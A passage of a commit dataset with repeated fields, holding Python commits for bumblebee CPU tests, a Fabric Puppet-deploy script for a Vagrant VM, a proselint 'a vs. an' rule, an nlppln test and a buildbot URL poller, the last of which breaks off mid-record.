[tests/cpu] Add unit tests for module cpu
|
# pylint: disable=C0103,C0111
import json
import unittest
import mock
import tests.mocks as mocks
from bumblebee.config import Config
from bumblebee.input import I3BarInput, LEFT_MOUSE
from bumblebee.modules.cpu import Module
class TestCPUModule(unittest.TestCase):
def setUp(self):
self._stdin, self._select, self.stdin, self.select = mocks.epoll_mock("bumblebee.input")
self.popen = mocks.MockPopen()
self._psutil = mock.patch("bumblebee.modules.cpu.psutil")
self.psutil = self._psutil.start()
self.config = Config()
self.input = I3BarInput()
self.engine = mock.Mock()
self.engine.input = self.input
self.input.need_event = True
self.module = Module(engine=self.engine, config={ "config": self.config })
for widget in self.module.widgets():
widget.link_module(self.module)
self.anyWidget = widget
def tearDown(self):
self._stdin.stop()
self._select.stop()
self._psutil.stop()
self.popen.cleanup()
def test_format(self):
self.psutil.cpu_percent.return_value = 21.0
self.module.update_all()
for widget in self.module.widgets():
            self.assertEqual(len(widget.full_text()), len("100.00%"))
def test_leftclick(self):
mocks.mouseEvent(stdin=self.stdin, button=LEFT_MOUSE, inp=self.input, module=self.module)
self.popen.assert_call("gnome-system-monitor")
def test_warning(self):
self.config.set("cpu.critical", "20")
self.config.set("cpu.warning", "18")
self.psutil.cpu_percent.return_value = 19.0
self.module.update_all()
self.assertTrue("warning" in self.module.state(self.anyWidget))
def test_critical(self):
self.config.set("cpu.critical", "20")
self.config.set("cpu.warning", "19")
self.psutil.cpu_percent.return_value = 21.0
self.module.update_all()
self.assertTrue("critical" in self.module.state(self.anyWidget))
# vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4
|
<commit_before><commit_msg>[tests/cpu] Add unit tests for module cpu<commit_after>
|
# pylint: disable=C0103,C0111
import json
import unittest
import mock
import tests.mocks as mocks
from bumblebee.config import Config
from bumblebee.input import I3BarInput, LEFT_MOUSE
from bumblebee.modules.cpu import Module
class TestCPUModule(unittest.TestCase):
def setUp(self):
self._stdin, self._select, self.stdin, self.select = mocks.epoll_mock("bumblebee.input")
self.popen = mocks.MockPopen()
self._psutil = mock.patch("bumblebee.modules.cpu.psutil")
self.psutil = self._psutil.start()
self.config = Config()
self.input = I3BarInput()
self.engine = mock.Mock()
self.engine.input = self.input
self.input.need_event = True
self.module = Module(engine=self.engine, config={ "config": self.config })
for widget in self.module.widgets():
widget.link_module(self.module)
self.anyWidget = widget
def tearDown(self):
self._stdin.stop()
self._select.stop()
self._psutil.stop()
self.popen.cleanup()
def test_format(self):
self.psutil.cpu_percent.return_value = 21.0
self.module.update_all()
for widget in self.module.widgets():
            self.assertEqual(len(widget.full_text()), len("100.00%"))
def test_leftclick(self):
mocks.mouseEvent(stdin=self.stdin, button=LEFT_MOUSE, inp=self.input, module=self.module)
self.popen.assert_call("gnome-system-monitor")
def test_warning(self):
self.config.set("cpu.critical", "20")
self.config.set("cpu.warning", "18")
self.psutil.cpu_percent.return_value = 19.0
self.module.update_all()
self.assertTrue("warning" in self.module.state(self.anyWidget))
def test_critical(self):
self.config.set("cpu.critical", "20")
self.config.set("cpu.warning", "19")
self.psutil.cpu_percent.return_value = 21.0
self.module.update_all()
self.assertTrue("critical" in self.module.state(self.anyWidget))
# vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4
|
[tests/cpu] Add unit tests for module cpu# pylint: disable=C0103,C0111
import json
import unittest
import mock
import tests.mocks as mocks
from bumblebee.config import Config
from bumblebee.input import I3BarInput, LEFT_MOUSE
from bumblebee.modules.cpu import Module
class TestCPUModule(unittest.TestCase):
def setUp(self):
self._stdin, self._select, self.stdin, self.select = mocks.epoll_mock("bumblebee.input")
self.popen = mocks.MockPopen()
self._psutil = mock.patch("bumblebee.modules.cpu.psutil")
self.psutil = self._psutil.start()
self.config = Config()
self.input = I3BarInput()
self.engine = mock.Mock()
self.engine.input = self.input
self.input.need_event = True
self.module = Module(engine=self.engine, config={ "config": self.config })
for widget in self.module.widgets():
widget.link_module(self.module)
self.anyWidget = widget
def tearDown(self):
self._stdin.stop()
self._select.stop()
self._psutil.stop()
self.popen.cleanup()
def test_format(self):
self.psutil.cpu_percent.return_value = 21.0
self.module.update_all()
for widget in self.module.widgets():
            self.assertEqual(len(widget.full_text()), len("100.00%"))
def test_leftclick(self):
mocks.mouseEvent(stdin=self.stdin, button=LEFT_MOUSE, inp=self.input, module=self.module)
self.popen.assert_call("gnome-system-monitor")
def test_warning(self):
self.config.set("cpu.critical", "20")
self.config.set("cpu.warning", "18")
self.psutil.cpu_percent.return_value = 19.0
self.module.update_all()
self.assertTrue("warning" in self.module.state(self.anyWidget))
def test_critical(self):
self.config.set("cpu.critical", "20")
self.config.set("cpu.warning", "19")
self.psutil.cpu_percent.return_value = 21.0
self.module.update_all()
self.assertTrue("critical" in self.module.state(self.anyWidget))
# vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4
|
<commit_before><commit_msg>[tests/cpu] Add unit tests for module cpu<commit_after># pylint: disable=C0103,C0111
import json
import unittest
import mock
import tests.mocks as mocks
from bumblebee.config import Config
from bumblebee.input import I3BarInput, LEFT_MOUSE
from bumblebee.modules.cpu import Module
class TestCPUModule(unittest.TestCase):
def setUp(self):
self._stdin, self._select, self.stdin, self.select = mocks.epoll_mock("bumblebee.input")
self.popen = mocks.MockPopen()
self._psutil = mock.patch("bumblebee.modules.cpu.psutil")
self.psutil = self._psutil.start()
self.config = Config()
self.input = I3BarInput()
self.engine = mock.Mock()
self.engine.input = self.input
self.input.need_event = True
self.module = Module(engine=self.engine, config={ "config": self.config })
for widget in self.module.widgets():
widget.link_module(self.module)
self.anyWidget = widget
def tearDown(self):
self._stdin.stop()
self._select.stop()
self._psutil.stop()
self.popen.cleanup()
def test_format(self):
self.psutil.cpu_percent.return_value = 21.0
self.module.update_all()
for widget in self.module.widgets():
            self.assertEqual(len(widget.full_text()), len("100.00%"))
def test_leftclick(self):
mocks.mouseEvent(stdin=self.stdin, button=LEFT_MOUSE, inp=self.input, module=self.module)
self.popen.assert_call("gnome-system-monitor")
def test_warning(self):
self.config.set("cpu.critical", "20")
self.config.set("cpu.warning", "18")
self.psutil.cpu_percent.return_value = 19.0
self.module.update_all()
self.assertTrue("warning" in self.module.state(self.anyWidget))
def test_critical(self):
self.config.set("cpu.critical", "20")
self.config.set("cpu.warning", "19")
self.psutil.cpu_percent.return_value = 21.0
self.module.update_all()
self.assertTrue("critical" in self.module.state(self.anyWidget))
# vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4
|
|
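Run note (the exact invocation is an assumption about the repository layout): the suite is plain unittest plus mock, so a single module can be executed from the repository root:

    #   python -m unittest tests.modules.test_cpu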
be55f40e56127e10779c0ec6ee2d628dbcf529ce
|
fabfile.py
|
fabfile.py
|
from fabric.api import cd, env, local, lcd, run
PUPPET_MASTER_IP = '192.168.33.10'
def puppet():
env.hosts = [
'vagrant@' + PUPPET_MASTER_IP + ':22',
]
env.passwords = {
'vagrant@' + PUPPET_MASTER_IP + ':22': 'vagrant'
}
def test():
with lcd('puppet/modules'):
with lcd('nginx'):
local('rspec')
def deploy():
puppet()
test()
run('rm -rf puppet-untitled-2016')
run('git clone https://github.com/zkan/puppet-untitled-2016.git')
run('sudo rm -rf /etc/puppet/manifests')
run('sudo ln -sf /home/vagrant/puppet-untitled-2016/puppet/manifests /etc/puppet/manifests')
run('sudo rm -rf /etc/puppet/modules')
run('sudo ln -sf /home/vagrant/puppet-untitled-2016/puppet/modules /etc/puppet/modules')
|
Use fabric to deploy Puppet modules
|
Use fabric to deploy Puppet modules
|
Python
|
mit
|
zkan/puppet-untitled-2016,zkan/puppet-untitled-2016
|
Use fabric to deploy Puppet modules
|
from fabric.api import cd, env, local, lcd, run
PUPPET_MASTER_IP = '192.168.33.10'
def puppet():
env.hosts = [
'vagrant@' + PUPPET_MASTER_IP + ':22',
]
env.passwords = {
'vagrant@' + PUPPET_MASTER_IP + ':22': 'vagrant'
}
def test():
with lcd('puppet/modules'):
with lcd('nginx'):
local('rspec')
def deploy():
puppet()
test()
run('rm -rf puppet-untitled-2016')
run('git clone https://github.com/zkan/puppet-untitled-2016.git')
run('sudo rm -rf /etc/puppet/manifests')
run('sudo ln -sf /home/vagrant/puppet-untitled-2016/puppet/manifests /etc/puppet/manifests')
run('sudo rm -rf /etc/puppet/modules')
run('sudo ln -sf /home/vagrant/puppet-untitled-2016/puppet/modules /etc/puppet/modules')
|
<commit_before><commit_msg>Use fabric to deploy Puppet modules<commit_after>
|
from fabric.api import cd, env, local, lcd, run
PUPPET_MASTER_IP = '192.168.33.10'
def puppet():
env.hosts = [
'vagrant@' + PUPPET_MASTER_IP + ':22',
]
env.passwords = {
'vagrant@' + PUPPET_MASTER_IP + ':22': 'vagrant'
}
def test():
with lcd('puppet/modules'):
with lcd('nginx'):
local('rspec')
def deploy():
puppet()
test()
run('rm -rf puppet-untitled-2016')
run('git clone https://github.com/zkan/puppet-untitled-2016.git')
run('sudo rm -rf /etc/puppet/manifests')
run('sudo ln -sf /home/vagrant/puppet-untitled-2016/puppet/manifests /etc/puppet/manifests')
run('sudo rm -rf /etc/puppet/modules')
run('sudo ln -sf /home/vagrant/puppet-untitled-2016/puppet/modules /etc/puppet/modules')
|
Use fabric to deploy Puppet modulesfrom fabric.api import cd, env, local, lcd, run
PUPPET_MASTER_IP = '192.168.33.10'
def puppet():
env.hosts = [
'vagrant@' + PUPPET_MASTER_IP + ':22',
]
env.passwords = {
'vagrant@' + PUPPET_MASTER_IP + ':22': 'vagrant'
}
def test():
with lcd('puppet/modules'):
with lcd('nginx'):
local('rspec')
def deploy():
puppet()
test()
run('rm -rf puppet-untitled-2016')
run('git clone https://github.com/zkan/puppet-untitled-2016.git')
run('sudo rm -rf /etc/puppet/manifests')
run('sudo ln -sf /home/vagrant/puppet-untitled-2016/puppet/manifests /etc/puppet/manifests')
run('sudo rm -rf /etc/puppet/modules')
run('sudo ln -sf /home/vagrant/puppet-untitled-2016/puppet/modules /etc/puppet/modules')
|
<commit_before><commit_msg>Use fabric to deploy Puppet modules<commit_after>from fabric.api import cd, env, local, lcd, run
PUPPET_MASTER_IP = '192.168.33.10'
def puppet():
env.hosts = [
'vagrant@' + PUPPET_MASTER_IP + ':22',
]
env.passwords = {
'vagrant@' + PUPPET_MASTER_IP + ':22': 'vagrant'
}
def test():
with lcd('puppet/modules'):
with lcd('nginx'):
local('rspec')
def deploy():
puppet()
test()
run('rm -rf puppet-untitled-2016')
run('git clone https://github.com/zkan/puppet-untitled-2016.git')
run('sudo rm -rf /etc/puppet/manifests')
run('sudo ln -sf /home/vagrant/puppet-untitled-2016/puppet/manifests /etc/puppet/manifests')
run('sudo rm -rf /etc/puppet/modules')
run('sudo ln -sf /home/vagrant/puppet-untitled-2016/puppet/modules /etc/puppet/modules')
|
|
b5cfe24ceba05aa9e94947f4a9a1223651095f98
|
proselint/checks/mau_a_vs_an.py
|
proselint/checks/mau_a_vs_an.py
|
# -*- coding: utf-8 -*-
"""MAU100: a vs. an
---
layout: post
error_code: MAU101
source: Garner's Modern American Usage
source_url: http://amzn.to/15wF76r
title: a vs. an
date: 2014-06-10 12:31:19
categories: writing
---
The first line is always wrong.
"""
import re
from nltk.corpus import cmudict
from proselint.memoize import memoize
def check(text):
error_code = "MAU101"
msg_a = "'a' should be 'an'."
msg_an = "'an' should be 'a'."
dic = cmudict.dict()
@memoize
def starts_with_vowel_sound(word):
"""Does the word start with a vowel sound?"""
# Get the pronunciations of the word.
pronunciations = dic.get(word)
if pronunciations is None:
return None
# For each pronunciation, see if it starts with a vowel sound.
is_vowel = [p[0][-1].isdigit() for p in pronunciations]
# Return the appropriate value only if all the pronunciations match.
if all(is_vowel):
return True
elif not any(is_vowel):
return False
else:
return None
errors = []
regex = re.compile("(^|\s+)(A|a|An|an)\s(\S*)\W")
    # Find all occurrences of the regex in the text.
    for m in regex.finditer(text):
        # Groups are (leading separator, article, following word).
        words = [group for group in m.groups()]
        vowel_sound = starts_with_vowel_sound(words[2])
        if vowel_sound is None:
            continue
        # A apple.
        if words[1] in ["A", "a"] and vowel_sound:
            errors.append((m.start(), m.end(), error_code, msg_a))
        # An day.
        elif words[1] in ["An", "an"] and not vowel_sound:
            errors.append((m.start(), m.end(), error_code, msg_an))
return errors
|
Add 'a' vs. 'an' rule
|
Add 'a' vs. 'an' rule
#31
|
Python
|
bsd-3-clause
|
amperser/proselint,amperser/proselint,amperser/proselint,jstewmon/proselint,amperser/proselint,amperser/proselint,jstewmon/proselint,jstewmon/proselint
|
Add 'a' vs. 'an' rule
#31
|
# -*- coding: utf-8 -*-
"""MAU100: a vs. an
---
layout: post
error_code: MAU101
source: Garner's Modern American Usage
source_url: http://amzn.to/15wF76r
title: a vs. an
date: 2014-06-10 12:31:19
categories: writing
---
The first line is always wrong.
"""
import re
from nltk.corpus import cmudict
from proselint.memoize import memoize
def check(text):
error_code = "MAU101"
msg_a = "'a' should be 'an'."
msg_an = "'an' should be 'a'."
dic = cmudict.dict()
@memoize
def starts_with_vowel_sound(word):
"""Does the word start with a vowel sound?"""
# Get the pronunciations of the word.
pronunciations = dic.get(word)
if pronunciations is None:
return None
# For each pronunciation, see if it starts with a vowel sound.
is_vowel = [p[0][-1].isdigit() for p in pronunciations]
# Return the appropriate value only if all the pronunciations match.
if all(is_vowel):
return True
elif not any(is_vowel):
return False
else:
return None
errors = []
regex = re.compile("(^|\s+)(A|a|An|an)\s(\S*)\W")
    # Find all occurrences of the regex in the text.
    for m in regex.finditer(text):
        # Groups are (leading separator, article, following word).
        words = [group for group in m.groups()]
        vowel_sound = starts_with_vowel_sound(words[2])
        if vowel_sound is None:
            continue
        # A apple.
        if words[1] in ["A", "a"] and vowel_sound:
            errors.append((m.start(), m.end(), error_code, msg_a))
        # An day.
        elif words[1] in ["An", "an"] and not vowel_sound:
            errors.append((m.start(), m.end(), error_code, msg_an))
return errors
|
<commit_before><commit_msg>Add 'a' vs. 'an' rule
#31<commit_after>
|
# -*- coding: utf-8 -*-
"""MAU100: a vs. an
---
layout: post
error_code: MAU101
source: Garner's Modern American Usage
source_url: http://amzn.to/15wF76r
title: a vs. an
date: 2014-06-10 12:31:19
categories: writing
---
The first line is always wrong.
"""
import re
from nltk.corpus import cmudict
from proselint.memoize import memoize
def check(text):
error_code = "MAU101"
msg_a = "'a' should be 'an'."
msg_an = "'an' should be 'a'."
dic = cmudict.dict()
@memoize
def starts_with_vowel_sound(word):
"""Does the word start with a vowel sound?"""
# Get the pronunciations of the word.
pronunciations = dic.get(word)
if pronunciations is None:
return None
# For each pronunciation, see if it starts with a vowel sound.
is_vowel = [p[0][-1].isdigit() for p in pronunciations]
# Return the appropriate value only if all the pronunciations match.
if all(is_vowel):
return True
elif not any(is_vowel):
return False
else:
return None
errors = []
regex = re.compile("(^|\s+)(A|a|An|an)\s(\S*)\W")
    # Find all occurrences of the regex in the text.
    for m in regex.finditer(text):
        # Groups are (leading separator, article, following word).
        words = [group for group in m.groups()]
        vowel_sound = starts_with_vowel_sound(words[2])
        if vowel_sound is None:
            continue
        # A apple.
        if words[1] in ["A", "a"] and vowel_sound:
            errors.append((m.start(), m.end(), error_code, msg_a))
        # An day.
        elif words[1] in ["An", "an"] and not vowel_sound:
            errors.append((m.start(), m.end(), error_code, msg_an))
return errors
|
Add 'a' vs. 'an' rule
#31# -*- coding: utf-8 -*-
"""MAU100: a vs. an
---
layout: post
error_code: MAU101
source: Garner's Modern American Usage
source_url: http://amzn.to/15wF76r
title: a vs. an
date: 2014-06-10 12:31:19
categories: writing
---
The first line is always wrong.
"""
import re
from nltk.corpus import cmudict
from proselint.memoize import memoize
def check(text):
error_code = "MAU101"
msg_a = "'a' should be 'an'."
msg_an = "'an' should be 'a'."
dic = cmudict.dict()
@memoize
def starts_with_vowel_sound(word):
"""Does the word start with a vowel sound?"""
# Get the pronunciations of the word.
pronunciations = dic.get(word)
if pronunciations is None:
return None
# For each pronunciation, see if it starts with a vowel sound.
is_vowel = [p[0][-1].isdigit() for p in pronunciations]
# Return the appropriate value only if all the pronunciations match.
if all(is_vowel):
return True
elif not any(is_vowel):
return False
else:
return None
errors = []
regex = re.compile("(^|\s+)(A|a|An|an)\s(\S*)\W")
    # Find all occurrences of the regex in the text.
    for m in regex.finditer(text):
        # Groups are (leading separator, article, following word).
        words = [group for group in m.groups()]
        vowel_sound = starts_with_vowel_sound(words[2])
        if vowel_sound is None:
            continue
        # A apple.
        if words[1] in ["A", "a"] and vowel_sound:
            errors.append((m.start(), m.end(), error_code, msg_a))
        # An day.
        elif words[1] in ["An", "an"] and not vowel_sound:
            errors.append((m.start(), m.end(), error_code, msg_an))
return errors
|
<commit_before><commit_msg>Add 'a' vs. 'an' rule
#31<commit_after># -*- coding: utf-8 -*-
"""MAU100: a vs. an
---
layout: post
error_code: MAU101
source: Garner's Modern American Usage
source_url: http://amzn.to/15wF76r
title: a vs. an
date: 2014-06-10 12:31:19
categories: writing
---
The first line is always wrong.
"""
import re
from nltk.corpus import cmudict
from proselint.memoize import memoize
def check(text):
error_code = "MAU101"
msg_a = "'a' should be 'an'."
msg_an = "'an' should be 'a'."
dic = cmudict.dict()
@memoize
def starts_with_vowel_sound(word):
"""Does the word start with a vowel sound?"""
# Get the pronunciations of the word.
pronunciations = dic.get(word)
if pronunciations is None:
return None
# For each pronunciation, see if it starts with a vowel sound.
is_vowel = [p[0][-1].isdigit() for p in pronunciations]
# Return the appropriate value only if all the pronunciations match.
if all(is_vowel):
return True
elif not any(is_vowel):
return False
else:
return None
errors = []
regex = re.compile("(^|\s+)(A|a|An|an)\s(\S*)\W")
    # Find all occurrences of the regex in the text.
    for m in regex.finditer(text):
        # Groups are (leading separator, article, following word).
        words = [group for group in m.groups()]
        vowel_sound = starts_with_vowel_sound(words[2])
        if vowel_sound is None:
            continue
        # A apple.
        if words[1] in ["A", "a"] and vowel_sound:
            errors.append((m.start(), m.end(), error_code, msg_a))
        # An day.
        elif words[1] in ["An", "an"] and not vowel_sound:
            errors.append((m.start(), m.end(), error_code, msg_an))
return errors
|
|
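The check returns (start, end, error_code, message) tuples over the raw text. An illustrative call, assuming the NLTK cmudict corpus has already been fetched (e.g. via nltk.download('cmudict')):

    from proselint.checks.mau_a_vs_an import check

    for start, end, code, msg in check("I ate a apple and an pear today."):
        print(code, msg)  # e.g. MAU101 'a' should be 'an'.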
7a4dbefbd105653866cdbad85965c07e30716b77
|
tests/test_wfgenerator.py
|
tests/test_wfgenerator.py
|
import pytest
from nlppln import WorkflowGenerator
class TestWFGenerator(object):
@pytest.fixture
def wf(self):
return WorkflowGenerator()
def test_steps_in_library(self, wf):
assert len(wf.steps_library) > 0
|
Test that at least one step is loaded in the steps library
|
Test that at least one step is loaded in the steps library
|
Python
|
apache-2.0
|
WhatWorksWhenForWhom/nlppln,WhatWorksWhenForWhom/nlppln,WhatWorksWhenForWhom/nlppln
|
Test that at least one step is loaded in the steps library
|
import pytest
from nlppln import WorkflowGenerator
class TestWFGenerator(object):
@pytest.fixture
def wf(self):
return WorkflowGenerator()
def test_steps_in_library(self, wf):
assert len(wf.steps_library) > 0
|
<commit_before><commit_msg>Test that at least one step is loaded in the steps library<commit_after>
|
import pytest
from nlppln import WorkflowGenerator
class TestWFGenerator(object):
@pytest.fixture
def wf(self):
return WorkflowGenerator()
def test_steps_in_library(self, wf):
assert len(wf.steps_library) > 0
|
Test that at least one step is loaded in the steps libraryimport pytest
from nlppln import WorkflowGenerator
class TestWFGenerator(object):
@pytest.fixture
def wf(self):
return WorkflowGenerator()
def test_steps_in_library(self, wf):
assert len(wf.steps_library) > 0
|
<commit_before><commit_msg>Test that at least one step is loaded in the steps library<commit_after>import pytest
from nlppln import WorkflowGenerator
class TestWFGenerator(object):
@pytest.fixture
def wf(self):
return WorkflowGenerator()
def test_steps_in_library(self, wf):
assert len(wf.steps_library) > 0
|
|
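Run note (sketch): the fixture is pytest-style, so the test is meant to be run with pytest:

    #   pytest tests/test_wfgenerator.py -q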
aedf8153750e0a45dd40fdc92e650ccaa944e22c
|
scripts/master/url_poller.py
|
scripts/master/url_poller.py
|
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""This PollingChangeSource polls a URL for the change number.
Each change is submitted to the change master, which triggers build steps.
Example:
To poll a change in Chromium build snapshots, use -
from buildbot.changes import url_poller
changeurl = 'http://commondatastorage.googleapis.com/'
'chromium-browser-snapshots/Linux/LAST_CHANGE'
poller = url_poller.URLPoller(changeurl=changeurl, pollInterval=10800)
c['change_source'] = [poller]
"""
from twisted.python import log
from twisted.web.client import getPage
from buildbot.changes import base
class URLPoller(base.PollingChangeSource):
"""Poll a URL for change number and submit to change master."""
compare_attrs = ['changeurl', 'pollInterval']
def __init__(self, changeurl, pollInterval=3600, category=None):
"""Initialize URLPoller.
Args:
changeurl: The URL to change number.
pollInterval: The time (in seconds) between queries for
changes (default is 1 hour)
"""
self.changeurl = changeurl
self.pollInterval = pollInterval
self.category = category
self.last_change = None
base.PollingChangeSource.__init__(self, changeurl, pollInterval, category)
def describe(self):
return 'URLPoller watching %s' % self.changeurl
def poll(self):
log.msg('URLPoller polling %s' % self.changeurl)
d = getPage(self.changeurl, timeout=self.pollInterval)
d.addCallback(self._process_changes)
d.addErrback(self._finished_failure)
return d
def _finished_failure(self, res):
log.msg('URLPoller poll failed: %s. URL: %s' % (res, self.changeurl))
def _process_changes(self, change):
log.msg('URLPoller finished polling %s' % self.changeurl)
# Skip calling addChange() if this is the first successful poll.
if self.last_change != change:
self.master.addChange(who='committer',
files=[],
comments='comment',
category=self.category)
self.last_change = change
|
Add a URL poller for Chromebot.
|
Add a URL poller for Chromebot.
Specifically for Chromebot, it just needs a simple way to trigger tests when 'http://commondatastorage.googleapis.com/chromium-browser-snapshots/Linux/LAST_CHANGE' changes.
Review URL: https://chromiumcodereview.appspot.com/12079048
git-svn-id: 239fca9b83025a0b6f823aeeca02ba5be3d9fd76@180488 0039d316-1c4b-4281-b951-d872f2087c98
|
Python
|
bsd-3-clause
|
eunchong/build,eunchong/build,eunchong/build,eunchong/build
|
Add a URL poller for Chromebot.
Specifically for Chromebot, it just needs a simple way to trigger tests when 'http://commondatastorage.googleapis.com/chromium-browser-snapshots/Linux/LAST_CHANGE' changes.
Review URL: https://chromiumcodereview.appspot.com/12079048
git-svn-id: 239fca9b83025a0b6f823aeeca02ba5be3d9fd76@180488 0039d316-1c4b-4281-b951-d872f2087c98
|
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""This PollingChangeSource polls a URL for the change number.
Each change is submitted to the change master, which triggers build steps.
Example:
To poll a change in Chromium build snapshots, use -
from buildbot.changes import url_poller
changeurl = 'http://commondatastorage.googleapis.com/'
'chromium-browser-snapshots/Linux/LAST_CHANGE'
poller = url_poller.URLPoller(changeurl=changeurl, pollInterval=10800)
c['change_source'] = [poller]
"""
from twisted.python import log
from twisted.web.client import getPage
from buildbot.changes import base
class URLPoller(base.PollingChangeSource):
"""Poll a URL for change number and submit to change master."""
compare_attrs = ['changeurl', 'pollInterval']
def __init__(self, changeurl, pollInterval=3600, category=None):
"""Initialize URLPoller.
Args:
changeurl: The URL to change number.
pollInterval: The time (in seconds) between queries for
changes (default is 1 hour)
"""
self.changeurl = changeurl
self.pollInterval = pollInterval
self.category = category
self.last_change = None
base.PollingChangeSource.__init__(self, changeurl, pollInterval, category)
def describe(self):
return 'URLPoller watching %s' % self.changeurl
def poll(self):
log.msg('URLPoller polling %s' % self.changeurl)
d = getPage(self.changeurl, timeout=self.pollInterval)
d.addCallback(self._process_changes)
d.addErrback(self._finished_failure)
return d
def _finished_failure(self, res):
log.msg('URLPoller poll failed: %s. URL: %s' % (res, self.changeurl))
def _process_changes(self, change):
log.msg('URLPoller finished polling %s' % self.changeurl)
# Skip calling addChange() if this is the first successful poll.
if self.last_change != change:
self.master.addChange(who='committer',
files=[],
comments='comment',
category=self.category)
self.last_change = change
|
<commit_before><commit_msg>Add a URL poller for Chromebot.
Specifically for Chromebot, it just needs a simple way to trigger tests when 'http://commondatastorage.googleapis.com/chromium-browser-snapshots/Linux/LAST_CHANGE' changes.
Review URL: https://chromiumcodereview.appspot.com/12079048
git-svn-id: 239fca9b83025a0b6f823aeeca02ba5be3d9fd76@180488 0039d316-1c4b-4281-b951-d872f2087c98<commit_after>
|
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""This PollingChangeSource polls a URL for the change number.
Each change is submitted to the change master, which triggers build steps.
Example:
To poll a change in Chromium build snapshots, use -
from buildbot.changes import url_poller
changeurl = 'http://commondatastorage.googleapis.com/'
'chromium-browser-snapshots/Linux/LAST_CHANGE'
poller = url_poller.URLPoller(changeurl=changeurl, pollInterval=10800)
c['change_source'] = [poller]
"""
from twisted.python import log
from twisted.web.client import getPage
from buildbot.changes import base
class URLPoller(base.PollingChangeSource):
"""Poll a URL for change number and submit to change master."""
compare_attrs = ['changeurl', 'pollInterval']
def __init__(self, changeurl, pollInterval=3600, category=None):
"""Initialize URLPoller.
Args:
changeurl: The URL to change number.
pollInterval: The time (in seconds) between queries for
changes (default is 1 hour)
"""
self.changeurl = changeurl
self.pollInterval = pollInterval
self.category = category
self.last_change = None
base.PollingChangeSource.__init__(self, changeurl, pollInterval, category)
def describe(self):
return 'URLPoller watching %s' % self.changeurl
def poll(self):
log.msg('URLPoller polling %s' % self.changeurl)
d = getPage(self.changeurl, timeout=self.pollInterval)
d.addCallback(self._process_changes)
d.addErrback(self._finished_failure)
return d
def _finished_failure(self, res):
log.msg('URLPoller poll failed: %s. URL: %s' % (res, self.changeurl))
def _process_changes(self, change):
log.msg('URLPoller finished polling %s' % self.changeurl)
# Skip calling addChange() if this is the first successful poll.
if self.last_change != change:
self.master.addChange(who='committer',
files=[],
comments='comment',
category=self.category)
self.last_change = change
|
Add a URL poller for Chromebot.
Specifically for Chromebot, it just needs a simple way to trigger tests when 'http://commondatastorage.googleapis.com/chromium-browser-snapshots/Linux/LAST_CHANGE' changes.
Review URL: https://chromiumcodereview.appspot.com/12079048
git-svn-id: 239fca9b83025a0b6f823aeeca02ba5be3d9fd76@180488 0039d316-1c4b-4281-b951-d872f2087c98# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""This PollingChangeSource polls a URL for the change number.
Each change is submitted to the change master, which triggers build steps.
Example:
To poll a change in Chromium build snapshots, use -
from buildbot.changes import url_poller
changeurl = 'http://commondatastorage.googleapis.com/'
'chromium-browser-snapshots/Linux/LAST_CHANGE'
poller = url_poller.URLPoller(changeurl=changeurl, pollInterval=10800)
c['change_source'] = [poller]
"""
from twisted.python import log
from twisted.web.client import getPage
from buildbot.changes import base
class URLPoller(base.PollingChangeSource):
"""Poll a URL for change number and submit to change master."""
compare_attrs = ['changeurl', 'pollInterval']
def __init__(self, changeurl, pollInterval=3600, category=None):
"""Initialize URLPoller.
Args:
changeurl: The URL to change number.
pollInterval: The time (in seconds) between queries for
changes (default is 1 hour)
"""
self.changeurl = changeurl
self.pollInterval = pollInterval
self.category = category
self.last_change = None
base.PollingChangeSource.__init__(self, changeurl, pollInterval, category)
def describe(self):
return 'URLPoller watching %s' % self.changeurl
def poll(self):
log.msg('URLPoller polling %s' % self.changeurl)
d = getPage(self.changeurl, timeout=self.pollInterval)
d.addCallback(self._process_changes)
d.addErrback(self._finished_failure)
return d
def _finished_failure(self, res):
log.msg('URLPoller poll failed: %s. URL: %s' % (res, self.changeurl))
def _process_changes(self, change):
log.msg('URLPoller finished polling %s' % self.changeurl)
# Skip calling addChange() if this is the first successful poll.
if self.last_change != change:
self.master.addChange(who='committer',
files=[],
comments='comment',
category=self.category)
self.last_change = change
|
<commit_before><commit_msg>Add a URL poller for Chromebot.
Specifically for Chromebot, it just needs a simple way to trigger tests when 'http://commondatastorage.googleapis.com/chromium-browser-snapshots/Linux/LAST_CHANGE' changes.
Review URL: https://chromiumcodereview.appspot.com/12079048
git-svn-id: 239fca9b83025a0b6f823aeeca02ba5be3d9fd76@180488 0039d316-1c4b-4281-b951-d872f2087c98<commit_after># Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""This PollingChangeSource polls a URL for the change number.
Each change is submitted to the change master, which triggers build steps.
Example:
To poll a change in Chromium build snapshots, use -
from buildbot.changes import url_poller
changeurl = 'http://commondatastorage.googleapis.com/'
'chromium-browser-snapshots/Linux/LAST_CHANGE'
poller = url_poller.URLPoller(changeurl=changeurl, pollInterval=10800)
c['change_source'] = [poller]
"""
from twisted.python import log
from twisted.web.client import getPage
from buildbot.changes import base
class URLPoller(base.PollingChangeSource):
"""Poll a URL for change number and submit to change master."""
compare_attrs = ['changeurl', 'pollInterval']
def __init__(self, changeurl, pollInterval=3600, category=None):
"""Initialize URLPoller.
Args:
changeurl: The URL to change number.
pollInterval: The time (in seconds) between queries for
changes (default is 1 hour)
"""
self.changeurl = changeurl
self.pollInterval = pollInterval
self.category = category
self.last_change = None
base.PollingChangeSource.__init__(self, changeurl, pollInterval, category)
def describe(self):
return 'URLPoller watching %s' % self.changeurl
def poll(self):
log.msg('URLPoller polling %s' % self.changeurl)
d = getPage(self.changeurl, timeout=self.pollInterval)
d.addCallback(self._process_changes)
d.addErrback(self._finished_failure)
return d
def _finished_failure(self, res):
log.msg('URLPoller poll failed: %s. URL: %s' % (res, self.changeurl))
def _process_changes(self, change):
log.msg('URLPoller finished polling %s' % self.changeurl)
# Skip calling addChange() if this is the first successful poll.
if self.last_change != change:
self.master.addChange(who='committer',
files=[],
comments='comment',
